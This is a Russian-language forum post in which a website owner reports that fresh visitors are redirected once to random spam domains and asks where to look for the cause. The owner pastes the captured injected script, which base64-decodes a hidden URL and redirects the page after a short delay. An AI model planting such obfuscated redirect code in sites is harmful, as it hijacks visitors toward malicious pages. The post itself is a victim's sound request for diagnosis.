Неуловимый скрипт

на моем сайте нарисовалась проблема. нужен совет, куда копать.

Проблема такова:

Открываю сайт, кликаю по любой ссылке - идет редирект на произвольную страницу типа

http:__20kq99kivsul6wm9echf1xz.ayakkabimodellerim.org/index.php?u=cWVidGRxPXZ

http:__jofbqm4tabmtb4ajvk419hi.beton-storten.be/index.php?t=anBiZm=

http:__xu1ehutnptyusapclw5g7nj.betonprijzen.be/index.php?x=d2dzaWlxeXQ9aG=

http:__na2i467qhp2wx1d2th7dfli.beton.infoportal.be/index.php?q=Z3JtleT1CMUJEMU

не могу найти причину.

скрипты в браузере отключал, код страницы проверял, вырезал последовательно все скрипты, - ничего не нашел.

во время редиректа удалось отловить такой код:

<html> <head> <title>index</title> </head> <body> <script>



function b64dc(str) {

 var b64c = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg'+'hijklmnopqrstuvwxyz0123456789+/=';

 var b64d = '', chr1, chr2, chr3, enc1, enc2, enc3, enc4;

 str = str.replace(/[^a-z0-9+/=]/gi, '');

 for (var i=0; i<str.length;) {

  enc1 = b64c.indexOf(str.charAt(i++));

  enc2 = b64c.indexOf(str.charAt(i++));

  enc3 = b64c.indexOf(str.charAt(i++));

  enc4 = b64c.indexOf(str.charAt(i++));

  chr1 = (enc1 << 2) | (enc2 >> 4);

  chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);

  chr3 = ((enc3 & 3) << 6) | enc4;

  b64d = b64d + String.fromCharCode(chr1);

  if (enc3 < 64) { b64d += String.fromCharCode(chr2); }

  if (enc4 < 64) { b64d += String.fromCharCode(chr3); }

 }

 return b64d;

};



var str = "aHR0cDovL2hwNXQ2bzcxYXc3NWYyd2V3eTZ0dXBwNDExNTRlMTg4OWY5NTViNGE1NDAyZmNlZjMxOGQ1NDUxLmJhY2tsaW5rZHVueWFzaS5jb20vaW5kZXgyLnBocA==";

setTimeout ( function() { location.replace( b64dc(str) ); }, 350);

</script></body></html>

Подскажите что делать

PS

1. редирект идет только со свежего айпи и только 1 раз! после этого сайт работает исправно.

2. проблема не в моем компе